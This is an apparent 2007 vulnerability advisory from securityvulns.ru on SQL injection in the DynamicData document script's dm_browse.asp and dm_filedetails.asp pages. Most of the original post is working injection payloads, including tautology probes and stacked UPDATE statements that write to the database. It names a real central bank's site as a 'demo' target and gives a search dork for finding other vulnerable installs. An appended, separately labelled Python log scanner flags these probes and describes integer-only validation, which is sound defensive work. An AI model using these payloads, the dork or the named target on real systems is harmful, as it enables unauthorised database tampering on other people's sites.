Computer Security
[EN] securityvulns.ru

From: okan alp <codexploder_(at)_hotmail.com>
Date: 03.08.2007
Subject: DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection

DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection


Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"


*****************************************************************************


1-)  example.com/[path]/dm_browse.asp?pid=(sql method)


2-)  example.com/dms/dm_browse.asp?pid=(sql method)

3-)  example.com/dynamicdata/dm_browse.asp?pid=(sql method)

4-)  example.com/dm_filedetails.asp?did=

*****************************************************************************

# example.com/dms/dm_browse.asp?pid=1'

# example.com/dynamicdata/dm_browse.asp?pid=1'

# example.com/dm_filedetails.asp?did=1'

1' or 1 having 1=1

# example.com/dms/dm_browse.asp?pid=1+update+tbl+set+col='text';--

# example.com/dynamicdata/dm_browse.asp?pid=1+update+tbl+set+col='text';--


# example.com/dm_filedetails.asp?did=1+update+tbl+set+col='text';--

*****************************************************************************

source site : http://racinebizservices.com/dynamicdata/dm_browse.asp  

demo site   : http://www.centralbank.org.bz/

order code for views sites :inurl:"dm_browse.asp?pid" "dm_filedetails.asp?did"
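
A defensive check for the two parameters named in this advisory, as an added example that is not part of the original post or the vendor's code: it scans web server log lines for requests to dm_browse.asp or dm_filedetails.asp whose pid/did value is not a plain integer. The log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Script name -> numeric ID parameter, as named in the advisory.
WATCHED = {"dm_browse.asp": "pid", "dm_filedetails.asp": "did"}
INT_ONLY = re.compile(r"[0-9]{1,10}")

def check_request(uri_stem, uri_query):
    """Return a reason string if pid/did is present but not an integer, else None."""
    script = uri_stem.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(script)
    if param is None:
        return None
    # parse_qsl decodes '+' and %XX, so encoded probes are seen in clear form.
    for name, value in parse_qsl(uri_query, keep_blank_values=True):
        if name.lower() == param and not INT_ONLY.fullmatch(value):
            return f"{script}: {param}={value!r} is not an integer"
    return None

def scan_log(lines):
    """Assumed layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        query = "" if fields[5] == "-" else fields[5]
        reason = check_request(fields[4], query)
        if reason:
            hits.append((fields[2], reason))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2007-08-03 10:00:01 192.0.2.10 GET /dms/dm_browse.asp pid=12 200",
    "2007-08-03 10:00:05 198.51.100.7 GET /dms/dm_browse.asp pid=1' 500",
    "2007-08-03 10:00:09 198.51.100.7 GET /dm_filedetails.asp did=1'+or+1+having+1=1 500",
    "2007-08-03 10:00:12 198.51.100.7 GET /dynamicdata/dm_browse.asp "
    "pid=1+update+tbl+set+col='text';-- 200",
    "2007-08-03 10:00:20 192.0.2.10 GET /default.asp - 200",
]

if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(ip, reason)
```

The same integer-only rule, applied in the ASP pages before pid or did reaches the database query, rejects every request shown in the advisory.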
